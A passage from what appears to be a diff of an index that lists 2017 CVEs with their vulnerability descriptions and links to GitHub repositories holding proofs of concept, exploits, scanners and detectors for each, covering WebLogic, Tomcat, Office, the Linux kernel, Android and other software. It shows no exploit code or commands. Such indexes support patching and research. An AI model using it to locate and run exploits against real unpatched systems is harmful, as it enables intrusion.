WLS - Web Services). The supported version that is affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H). + + +- [bigsizeme/weblogic-XMLDecoder](https://github.com/bigsizeme/weblogic-XMLDecoder) + +### CVE-2017-10366 (2017-10-19) + +Vulnerability in the PeopleSoft Enterprise PT PeopleTools component of Oracle PeopleSoft Products (subcomponent: Performance Monitor). Supported versions that are affected are 8.54, 8.55 and 8.56. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PT PeopleTools. Successful attacks of this vulnerability can result in takeover of PeopleSoft Enterprise PT PeopleTools. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [blazeinfosec/CVE-2017-10366_peoplesoft](https://github.com/blazeinfosec/CVE-2017-10366_peoplesoft) + +### CVE-2017-10617 (2017-10-13) + +The ifmap service that comes bundled with Contrail has an XML External Entity (XXE) vulnerability that may allow an attacker to retrieve sensitive system files. Affected releases are Juniper Networks Contrail 2.2 prior to 2.21.4; 3.0 prior to 3.0.3.4; 3.1 prior to 3.1.4.0; 3.2 prior to 3.2.5.0. CVE-2017-10616 and CVE-2017-10617 can be chained together and have a combined CVSSv3 score of 5.8 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N). + + +- [gteissier/CVE-2017-10617](https://github.com/gteissier/CVE-2017-10617) + +### CVE-2017-10661 (2017-08-19) + +Race condition in fs/timerfd.c in the Linux kernel before 4.10.15 allows local users to gain privileges or cause a denial of service (list corruption or use-after-free) via simultaneous file-descriptor operations that leverage improper might_cancel queueing. + + +- [GeneBlue/CVE-2017-10661_POC](https://github.com/GeneBlue/CVE-2017-10661_POC) + +### CVE-2017-10797 +- [n4xh4ck5/CVE-2017-10797](https://github.com/n4xh4ck5/CVE-2017-10797) + +### CVE-2017-10952 (2017-08-29) + +This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.2.0.2051. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the saveAs JavaScript function. The issue results from the lack of proper validation of user-supplied data, which can lead to writing arbitrary files into attacker controlled locations. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-4518. + + +- [afbase/CVE-2017-10952](https://github.com/afbase/CVE-2017-10952) + +### CVE-2017-11176 (2017-07-11) + +The mq_notify function in the Linux kernel through 4.11.9 does not set the sock pointer to NULL upon entry into the retry logic. During a user-space close of a Netlink socket, it allows attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact. + + +- [lexfo/cve-2017-11176](https://github.com/lexfo/cve-2017-11176) +- [DoubleMice/cve-2017-11176](https://github.com/DoubleMice/cve-2017-11176) +- [HckEX/CVE-2017-11176](https://github.com/HckEX/CVE-2017-11176) +- [leonardo1101/cve-2017-11176](https://github.com/leonardo1101/cve-2017-11176) +- [c3r34lk1ll3r/CVE-2017-11176](https://github.com/c3r34lk1ll3r/CVE-2017-11176) +- [Sama-Ayman-Mokhtar/CVE-2017-11176](https://github.com/Sama-Ayman-Mokhtar/CVE-2017-11176) +- [Yanoro/CVE-2017-11176](https://github.com/Yanoro/CVE-2017-11176) + +### CVE-2017-11317 (2017-08-23) + +Telerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code. + + +- [bao7uo/RAU_crypto](https://github.com/bao7uo/RAU_crypto) +- [KasunPriyashan/Unrestricted-File-Upload-by-Weak-Encryption-affected-versions-CVE-2017-11317-Remote-Code-Execut](https://github.com/KasunPriyashan/Unrestricted-File-Upload-by-Weak-Encryption-affected-versions-CVE-2017-11317-Remote-Code-Execut) +- [KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation](https://github.com/KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation) +- [hlong12042/CVE-2017-11317-and-CVE-2017-11357-in-Telerik](https://github.com/hlong12042/CVE-2017-11317-and-CVE-2017-11357-in-Telerik) + +### CVE-2017-11366 (2017-08-21) + +components/filemanager/class.filemanager.php in Codiad before 2.8.4 is vulnerable to remote command execution because shell commands can be embedded in parameter values, as demonstrated by search_file_type. + + +- [hidog123/Codiad-CVE-2018-14009](https://github.com/hidog123/Codiad-CVE-2018-14009) + +### CVE-2017-11427 (2019-04-17) + +OneLogin PythonSAML 2.3.0 and earlier may incorrectly utilize the results of XML DOM traversal and canonicalization APIs in such a way that an attacker may be able to manipulate the SAML data without invalidating the cryptographic signature, allowing the attack to potentially bypass authentication to SAML service providers. + + +- [CHYbeta/CVE-2017-11427-DEMO](https://github.com/CHYbeta/CVE-2017-11427-DEMO) + +### CVE-2017-11503 (2017-07-20) + +PHPMailer 5.2.23 has XSS in the "From Email Address" and "To Email Address" fields of code_generator.php. + + +- [wizardafric/download](https://github.com/wizardafric/download) + +### CVE-2017-11519 (2017-07-21) + +passwd_recovery.lua on the TP-Link Archer C9(UN)_V2_160517 allows an attacker to reset the admin password by leveraging a predictable random number generator seed. This is fixed in C9(UN)_V2_170511. + + +- [vakzz/tplink-CVE-2017-11519](https://github.com/vakzz/tplink-CVE-2017-11519) + +### CVE-2017-11610 (2017-08-23) + +The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups. + + +- [ivanitlearning/CVE-2017-11610](https://github.com/ivanitlearning/CVE-2017-11610) +- [yaunsky/CVE-2017-11610](https://github.com/yaunsky/CVE-2017-11610) + +### CVE-2017-11611 (2017-09-08) + +Wolf CMS 0.8.3.1 allows Cross-Site Scripting (XSS) attacks. The vulnerability exists due to insufficient sanitization of the file name in a "create-file-popup" action, and the directory name in a "create-directory-popup" action, in the HTTP POST method to the "/plugin/file_manager/" script (aka an /admin/plugin/file_manager/browse// URI). + + +- [faizzaidi/Wolfcms-v0.8.3.1-xss-POC-by-Provensec-llc](https://github.com/faizzaidi/Wolfcms-v0.8.3.1-xss-POC-by-Provensec-llc) + +### CVE-2017-11774 (2017-10-13) + +Microsoft Outlook 2010 SP2, Outlook 2013 SP1 and RT SP1, and Outlook 2016 allow an attacker to execute arbitrary commands, due to how Microsoft Office handles objects in memory, aka "Microsoft Outlook Security Feature Bypass Vulnerability." + + +- [devcoinfet/SniperRoost](https://github.com/devcoinfet/SniperRoost) + +### CVE-2017-11783 (2017-10-13) + +Microsoft Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation of privilege vulnerability in the way it handles calls to Advanced Local Procedure Call (ALPC), aka "Windows Elevation of Privilege Vulnerability". + + +- [Sheisback/CVE-2017-11783](https://github.com/Sheisback/CVE-2017-11783) + +### CVE-2017-11826 (2017-10-13) + +Microsoft Office 2010, SharePoint Enterprise Server 2010, SharePoint Server 2010, Web Applications, Office Web Apps Server 2010 and 2013, Word Viewer, Word 2007, 2010, 2013 and 2016, Word Automation Services, and Office Online Server allow remote code execution when the software fails to properly handle objects in memory. + + +- [thatskriptkid/CVE-2017-11826](https://github.com/thatskriptkid/CVE-2017-11826) + +### CVE-2017-11882 (2017-11-15) + +Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11884. + + +- [zhouat/cve-2017-11882](https://github.com/zhouat/cve-2017-11882) +- [embedi/CVE-2017-11882](https://github.com/embedi/CVE-2017-11882) +- [Ridter/CVE-2017-11882](https://github.com/Ridter/CVE-2017-11882) +- [BlackMathIT/2017-11882_Generator](https://github.com/BlackMathIT/2017-11882_Generator) +- [rip1s/CVE-2017-11882](https://github.com/rip1s/CVE-2017-11882) +- [0x09AL/CVE-2017-11882-metasploit](https://github.com/0x09AL/CVE-2017-11882-metasploit) +- [HZachev/ABC](https://github.com/HZachev/ABC) +- [starnightcyber/CVE-2017-11882](https://github.com/starnightcyber/CVE-2017-11882) +- [Grey-Li/CVE-2017-11882](https://github.com/Grey-Li/CVE-2017-11882) +- [legendsec/CVE-2017-11882-for-Kali](https://github.com/legendsec/CVE-2017-11882-for-Kali) +- [CSC-pentest/cve-2017-11882](https://github.com/CSC-pentest/cve-2017-11882) +- [Shadowshusky/CVE-2017-11882-](https://github.com/Shadowshusky/CVE-2017-11882-) +- [rxwx/CVE-2018-0802](https://github.com/rxwx/CVE-2018-0802) +- [Ridter/RTF_11882_0802](https://github.com/Ridter/RTF_11882_0802) +- [likekabin/CVE-2017-11882](https://github.com/likekabin/CVE-2017-11882) +- [likekabin/CVE-2018-0802_CVE-2017-11882](https://github.com/likekabin/CVE-2018-0802_CVE-2017-11882) +- [herbiezimmerman/CVE-2017-11882-Possible-Remcos-Malspam](https://github.com/herbiezimmerman/CVE-2017-11882-Possible-Remcos-Malspam) +- [ChaitanyaHaritash/CVE-2017-11882](https://github.com/ChaitanyaHaritash/CVE-2017-11882) +- [qy1202/https-github.com-Ridter-CVE-2017-11882-](https://github.com/qy1202/https-github.com-Ridter-CVE-2017-11882-) +- [j0lama/CVE-2017-11882](https://github.com/j0lama/CVE-2017-11882) +- [chanbin/CVE-2017-11882](https://github.com/chanbin/CVE-2017-11882) +- [littlebin404/CVE-2017-11882](https://github.com/littlebin404/CVE-2017-11882) +- [ekgg/Overflow-Demo-CVE-2017-11882](https://github.com/ekgg/Overflow-Demo-CVE-2017-11882) +- [HaoJame/CVE-2017-11882](https://github.com/HaoJame/CVE-2017-11882) +- [ActorExpose/CVE-2017-11882](https://github.com/ActorExpose/CVE-2017-11882) +- [Retr0-code/SignHere](https://github.com/Retr0-code/SignHere) +- [lisinan988/CVE-2017-11882-exp](https://github.com/lisinan988/CVE-2017-11882-exp) +- [tzwlhack/CVE-2017-11882](https://github.com/tzwlhack/CVE-2017-11882) +- [Sunqiz/CVE-2017-11882-reproduction](https://github.com/Sunqiz/CVE-2017-11882-reproduction) +- [Abdibimantara/Maldoc-Analysis](https://github.com/Abdibimantara/Maldoc-Analysis) +- [n18dcat053-luuvannga/DetectPacket-CVE-2017-11882](https://github.com/n18dcat053-luuvannga/DetectPacket-CVE-2017-11882) +- [nhuynhuy/cve-2017-11882](https://github.com/nhuynhuy/cve-2017-11882) +- [jadeapar/Dragonfish-s-Malware-Cyber-Analysis](https://github.com/jadeapar/Dragonfish-s-Malware-Cyber-Analysis) + +### CVE-2017-11907 (2017-12-12) + +Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930. + + +- [AV1080p/CVE-2017-11907](https://github.com/AV1080p/CVE-2017-11907) + +### CVE-2017-12149 (2017-10-04) + +In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data. + + +- [sevck/CVE-2017-12149](https://github.com/sevck/CVE-2017-12149) +- [yunxu1/jboss-_CVE-2017-12149](https://github.com/yunxu1/jboss-_CVE-2017-12149) +- [1337g/CVE-2017-12149](https://github.com/1337g/CVE-2017-12149) +- [jreppiks/CVE-2017-12149](https://github.com/jreppiks/CVE-2017-12149) +- [Xcatolin/jboss-deserialization](https://github.com/Xcatolin/jboss-deserialization) +- [VVeakee/CVE-2017-12149](https://github.com/VVeakee/CVE-2017-12149) +- [MrE-Fog/jboss-_CVE-2017-12149](https://github.com/MrE-Fog/jboss-_CVE-2017-12149) +- [JesseClarkND/CVE-2017-12149](https://github.com/JesseClarkND/CVE-2017-12149) + +### CVE-2017-12426 (2017-08-14) + +GitLab Community Edition (CE) and Enterprise Edition (EE) before 8.17.8, 9.0.x before 9.0.13, 9.1.x before 9.1.10, 9.2.x before 9.2.10, 9.3.x before 9.3.10, and 9.4.x before 9.4.4 might allow remote attackers to execute arbitrary code via a crafted SSH URL in a project import. + + +- [sm-paul-schuette/CVE-2017-12426](https://github.com/sm-paul-schuette/CVE-2017-12426) + +### CVE-2017-12542 (2018-02-15) + +A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. + + +- [skelsec/CVE-2017-12542](https://github.com/skelsec/CVE-2017-12542) +- [sk1dish/ilo4-rce-vuln-scanner](https://github.com/sk1dish/ilo4-rce-vuln-scanner) + +### CVE-2017-12561 (2018-02-15) + +A remote code execution vulnerability in HPE intelligent Management Center (iMC) PLAT version Plat 7.3 E0504P4 and earlier was found. + + +- [Everdoh/CVE-2017-12561](https://github.com/Everdoh/CVE-2017-12561) + +### CVE-2017-12611 (2017-09-20) + +In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack. + + +- [brianwrf/S2-053-CVE-2017-12611](https://github.com/brianwrf/S2-053-CVE-2017-12611) + +### CVE-2017-12615 (2017-09-19) + +When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. + + +- [breaktoprotect/CVE-2017-12615](https://github.com/breaktoprotect/CVE-2017-12615) +- [mefulton/cve-2017-12615](https://github.com/mefulton/cve-2017-12615) +- [zi0Black/POC-CVE-2017-12615-or-CVE-2017-12717](https://github.com/zi0Black/POC-CVE-2017-12615-or-CVE-2017-12717) +- [wsg00d/cve-2017-12615](https://github.com/wsg00d/cve-2017-12615) +- [BeyondCy/CVE-2017-12615](https://github.com/BeyondCy/CVE-2017-12615) +- [1337g/CVE-2017-12615](https://github.com/1337g/CVE-2017-12615) +- [Shellkeys/CVE-2017-12615](https://github.com/Shellkeys/CVE-2017-12615) +- [cved-sources/cve-2017-12615](https://github.com/cved-sources/cve-2017-12615) +- [ianxtianxt/CVE-2017-12615](https://github.com/ianxtianxt/CVE-2017-12615) +- [cyberharsh/Tomcat-CVE-2017-12615](https://github.com/cyberharsh/Tomcat-CVE-2017-12615) +- [w0x68y/CVE-2017-12615-EXP](https://github.com/w0x68y/CVE-2017-12615-EXP) +- [tpt11fb/AttackTomcat](https://github.com/tpt11fb/AttackTomcat) +- [xiaokp7/Tomcat_PUT_GUI_EXP](https://github.com/xiaokp7/Tomcat_PUT_GUI_EXP) +- [lizhianyuguangming/TomcatScanPro](https://github.com/lizhianyuguangming/TomcatScanPro) +- [wudidwo/CVE-2017-12615-poc](https://github.com/wudidwo/CVE-2017-12615-poc) + +### CVE-2017-12617 (2017-10-03) + +When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. + + +- [cyberheartmi9/CVE-2017-12617](https://github.com/cyberheartmi9/CVE-2017-12617) +- [devcoinfet/CVE-2017-12617](https://github.com/devcoinfet/CVE-2017-12617) +- [qiantu88/CVE-2017-12617](https://github.com/qiantu88/CVE-2017-12617) +- [ygouzerh/CVE-2017-12617](https://github.com/ygouzerh/CVE-2017-12617) +- [tyranteye666/tomcat-cve-2017-12617](https://github.com/tyranteye666/tomcat-cve-2017-12617) +- [jptr218/tc_hack](https://github.com/jptr218/tc_hack) +- [LongWayHomie/CVE-2017-12617](https://github.com/LongWayHomie/CVE-2017-12617) +- [K3ysTr0K3R/CVE-2017-12617-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-12617-EXPLOIT) +- [scirusvulgaris/CVE-2017-12617](https://github.com/scirusvulgaris/CVE-2017-12617) +- [yZ1337/CVE-2017-12617](https://github.com/yZ1337/CVE-2017-12617) + +### CVE-2017-12624 (2017-11-14) + +Apache CXF supports sending and receiving attachments via either the JAX-WS or JAX-RS specifications. It is possible to craft a message attachment header that could lead to a Denial of Service (DoS) attack on a CXF web service provider. Both JAX-WS and JAX-RS services are vulnerable to this attack. From Apache CXF 3.2.1 and 3.1.14, message attachment headers that are greater than 300 characters will be rejected by default. This value is configurable via the property "attachment-max-header-size". + + +- [tafamace/CVE-2017-12624](https://github.com/tafamace/CVE-2017-12624) + +### CVE-2017-12635 (2017-11-14) + +Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. + + +- [assalielmehdi/CVE-2017-12635](https://github.com/assalielmehdi/CVE-2017-12635) +- [cyberharsh/Apache-couchdb-CVE-2017-12635](https://github.com/cyberharsh/Apache-couchdb-CVE-2017-12635) +- [Weisant/CVE-2017-12635-POC](https://github.com/Weisant/CVE-2017-12635-POC) + +### CVE-2017-12636 (2017-11-14) + +CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet. + + +- [moayadalmalat/CVE-2017-12636](https://github.com/moayadalmalat/CVE-2017-12636) +- [XTeam-Wing/CVE-2017-12636](https://github.com/XTeam-Wing/CVE-2017-12636) + +### CVE-2017-12792 (2017-10-02) + +Multiple cross-site request forgery (CSRF) vulnerabilities in NexusPHP 1.5 allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the (1) linkname, (2) url, or (3) title parameter in an add action to linksmanage.php. + + +- [ZZS2017/cve-2017-12792](https://github.com/ZZS2017/cve-2017-12792) + +### CVE-2017-12852 (2017-08-15) + +The numpy.pad function in Numpy 1.13.1 and older versions is missing input validation. An empty list or ndarray will stick into an infinite loop, which can allow attackers to cause a DoS attack. + + +- [BT123/numpy-1.13.1](https://github.com/BT123/numpy-1.13.1) + +### CVE-2017-12943 (2017-08-18) + +D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password. + + +- [aymankhalfatni/D-Link](https://github.com/aymankhalfatni/D-Link) +- [d4rk30/CVE-2017-12943](https://github.com/d4rk30/CVE-2017-12943) + +### CVE-2017-12945 (2019-11-27) + +Insufficient validation of user-supplied input for the Solstice Pod before 2.8.4 networking configuration enables authenticated attackers to execute arbitrary commands as root. + + +- [aress31/cve-2017-12945](https://github.com/aress31/cve-2017-12945) + +### CVE-2017-13089 (2017-10-27) + +The http.c:skip_short_body() function is called in some circumstances, such as when processing redirects. When the response is sent chunked in wget before 1.19.2, the chunk parser uses strtol() to read each chunk's length, but doesn't check that the chunk length is a non-negative number. The code then tries to skip the chunk in pieces of 512 bytes by using the MIN() macro, but ends up passing the negative chunk length to connect.c:fd_read(). As fd_read() takes an int argument, the high 32 bits of the chunk length are discarded, leaving fd_read() with a completely attacker controlled length argument. + + +- [r1b/CVE-2017-13089](https://github.com/r1b/CVE-2017-13089) +- [mzeyong/CVE-2017-13089](https://github.com/mzeyong/CVE-2017-13089) + +### CVE-2017-13156 (2017-12-06) + +An elevation of privilege vulnerability in the Android system (art). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-64211847. + + +- [xyzAsian/Janus-CVE-2017-13156](https://github.com/xyzAsian/Janus-CVE-2017-13156) +- [caxmd/CVE-2017-13156](https://github.com/caxmd/CVE-2017-13156) +- [giacomoferretti/janus-toolkit](https://github.com/giacomoferretti/janus-toolkit) +- [tea9/CVE-2017-13156-Janus](https://github.com/tea9/CVE-2017-13156-Janus) +- [M507/CVE-2017-13156](https://github.com/M507/CVE-2017-13156) +- [nahid0x1/Janus-Vulnerability-CVE-2017-13156-Exploit](https://github.com/nahid0x1/Janus-Vulnerability-CVE-2017-13156-Exploit) + +### CVE-2017-13208 (2018-01-12) + +In receive_packet of libnetutils/packet.c, there is a possible out-of-bounds write due to a missing bounds check on the DHCP response. This could lead to remote code execution as a privileged process with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, 8.1. Android ID: A-67474440. + + +- [idanshechter/CVE-2017-13208-Scanner](https://github.com/idanshechter/CVE-2017-13208-Scanner) + +### CVE-2017-13253 (2018-04-04) + +In CryptoPlugin::decrypt of CryptoPlugin.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: 8.0, 8.1. Android ID: A-71389378. + + +- [tamirzb/CVE-2017-13253](https://github.com/tamirzb/CVE-2017-13253) + +### CVE-2017-13286 (2018-04-04) + +In writeToParcel and readFromParcel of OutputConfiguration.java, there is a permission bypass due to mismatched serialization. This could lead to a local escalation of privilege where the user can start an activity with system privileges, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: 8.0, 8.1. Android ID: A-69683251. + + +- [UmVfX1BvaW50/CVE-2017-13286](https://github.com/UmVfX1BvaW50/CVE-2017-13286) + +### CVE-2017-13672 (2017-09-01) + +QEMU (aka Quick Emulator), when built with the VGA display emulator support, allows local guest OS privileged users to cause a denial of service (out-of-bounds read and QEMU process crash) via vectors involving display update. + + +- [DavidBuchanan314/CVE-2017-13672](https://github.com/DavidBuchanan314/CVE-2017-13672) + +### CVE-2017-13868 (2017-12-25) + +An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app. + + +- [bazad/ctl_ctloutput-leak](https://github.com/bazad/ctl_ctloutput-leak) + +### CVE-2017-13872 (2017-11-29) + +An issue was discovered in certain Apple products. macOS High Sierra before Security Update 2017-001 is affected. The issue involves the "Directory Utility" component. It allows attackers to obtain administrator access without a password via certain interactions involving entry of the root user name. + + +- [giovannidispoto/CVE-2017-13872-Patch](https://github.com/giovannidispoto/CVE-2017-13872-Patch) + +### CVE-2017-14105 (2017-09-01) + +HiveManager Classic through 8.1r1 allows arbitrary JSP code execution by modifying a backup archive before a restore, because the restore feature does not validate pathnames within the archive. An authenticated, local attacker - even restricted as a tenant - can add a jsp at HiveManager/tomcat/webapps/hm/domains/$yourtenant/maps (it will be exposed at the web interface). + + +- [theguly/CVE-2017-14105](https://github.com/theguly/CVE-2017-14105) + +### CVE-2017-14262 (2017-09-11) + +On Samsung NVR devices, remote attackers can read the MD5 password hash of the 'admin' account via certain szUserName JSON data to cgi-bin/main-cgi, and login to the device with that hash in the szUserPasswd parameter. + + +- [zzz66686/CVE-2017-14262](https://github.com/zzz66686/CVE-2017-14262) + +### CVE-2017-14263 (2017-09-11) + +Honeywell NVR devices allow remote attackers to create a user account in the admin group by leveraging access to a guest account to obtain a session ID, and then sending that session ID in a userManager.addUser request to the /RPC2 URI. The attacker can login to the device with that new user account to fully control the device. + + +- [zzz66686/CVE-2017-14263](https://github.com/zzz66686/CVE-2017-14263) + +### CVE-2017-14322 (2017-10-18) + +The function in charge to check whether the user is already logged in init.php in Interspire Email Marketer (IEM) prior to 6.1.6 allows remote attackers to bypass authentication and obtain administrative access by using the IEM_CookieLogin cookie with a specially crafted value. + + +- [joesmithjaffa/CVE-2017-14322](https://github.com/joesmithjaffa/CVE-2017-14322) + +### CVE-2017-14491 (2017-10-02) + +Heap-based buffer overflow in dnsmasq before 2.78 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted DNS response. + + +- [skyformat99/dnsmasq-2.4.1-fix-CVE-2017-14491](https://github.com/skyformat99/dnsmasq-2.4.1-fix-CVE-2017-14491) + +### CVE-2017-14493 (2017-10-02) + +Stack-based buffer overflow in dnsmasq before 2.78 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted DHCPv6 request. + + +- [pupiles/bof-dnsmasq-cve-2017-14493](https://github.com/pupiles/bof-dnsmasq-cve-2017-14493) + +### CVE-2017-14719 (2017-09-23) + +Before version 4.8.2, WordPress was vulnerable to a directory traversal attack during unzip operations in the ZipArchive and PclZip components. + + +- [PalmTreeForest/CodePath_Week_7-8](https://github.com/PalmTreeForest/CodePath_Week_7-8) + +### CVE-2017-14948 (2019-10-14) + +Certain D-Link products are affected by: Buffer Overflow. This affects DIR-880L 1.08B04 and DIR-895 L/R 1.13b03. The impact is: execute arbitrary code (remote). The component is: htdocs/fileaccess.cgi. The attack vector is: A crafted HTTP request handled by fileacces.cgi could allow an attacker to mount a ROP attack: if the HTTP header field CONTENT_TYPE starts with ''boundary=' followed by more than 256 characters, a buffer overflow would be triggered, potentially causing code execution. + + +- [badnack/d_link_880_bug](https://github.com/badnack/d_link_880_bug) + +### CVE-2017-14954 (2017-10-01) + +The waitid implementation in kernel/exit.c in the Linux kernel through 4.13.4 accesses rusage data structures in unintended cases, which allows local users to obtain sensitive information, and bypass the KASLR protection mechanism, via a crafted system call. + + +- [echo-devim/exploit_linux_kernel4.13](https://github.com/echo-devim/exploit_linux_kernel4.13) + +### CVE-2017-14980 (2017-10-09) + +Buffer overflow in Sync Breeze Enterprise 10.0.28 allows remote attackers to have unspecified impact via a long username parameter to /login. + + +- [TheDarthMole/CVE-2017-14980](https://github.com/TheDarthMole/CVE-2017-14980) + +### CVE-2017-15099 (2017-11-22) + +INSERT ... ON CONFLICT DO UPDATE commands in PostgreSQL 10.x before 10.1, 9.6.x before 9.6.6, and 9.5.x before 9.5.10 disclose table contents that the invoker lacks privilege to read. These exploits affect only tables where the attacker lacks full read access but has both INSERT and UPDATE privileges. Exploits bypass row level security policies and lack of SELECT privilege. + + +- [ToontjeM/CVE-2017-15099](https://github.com/ToontjeM/CVE-2017-15099) + +### CVE-2017-15120 (2018-07-27) + +An issue has been found in the parsing of authoritative answers in PowerDNS Recursor before 4.0.8, leading to a NULL pointer dereference when parsing a specially crafted answer containing a CNAME of a different class than IN. An unauthenticated remote attacker could cause a denial of service. + + +- [shutingrz/CVE-2017-15120_PoC](https://github.com/shutingrz/CVE-2017-15120_PoC) + +### CVE-2017-15277 (2017-10-12) + +ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26 leaves the palette uninitialized when processing a GIF file that has neither a global nor local palette. If the affected product is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette. + + +- [hexrom/ImageMagick-CVE-2017-15277](https://github.com/hexrom/ImageMagick-CVE-2017-15277) + +### CVE-2017-15303 (2017-10-16) + +In CPUID CPU-Z before 1.43, there is an arbitrary memory write that results directly in elevation of privileges, because any program running on the local machine (while CPU-Z is running) can issue an ioctl 0x9C402430 call to the kernel-mode driver (e.g., cpuz141_x64.sys for version 1.41). + + +- [hfiref0x/Stryker](https://github.com/hfiref0x/Stryker) + +### CVE-2017-15361 (2017-10-16) + +The Infineon RSA library 1.02.013 in Infineon Trusted Platform Module (TPM) firmware, such as versions before 0000000000000422 - 4.34, before 000000000000062b - 6.43, and before 0000000000008521 - 133.33, mishandles RSA key generation, which makes it easier for attackers to defeat various cryptographic protection mechanisms via targeted attacks, aka ROCA. Examples of affected technologies include BitLocker with TPM 1.2, YubiKey 4 (before 4.3.5) PGP key generation, and the Cached User Data encryption feature in Chrome OS. + + +- [lva/Infineon-CVE-2017-15361](https://github.com/lva/Infineon-CVE-2017-15361) +- [titanous/rocacheck](https://github.com/titanous/rocacheck) +- [nsacyber/Detect-CVE-2017-15361-TPM](https://github.com/nsacyber/Detect-CVE-2017-15361-TPM) +- [0xxon/zeek-plugin-roca](https://github.com/0xxon/zeek-plugin-roca) +- 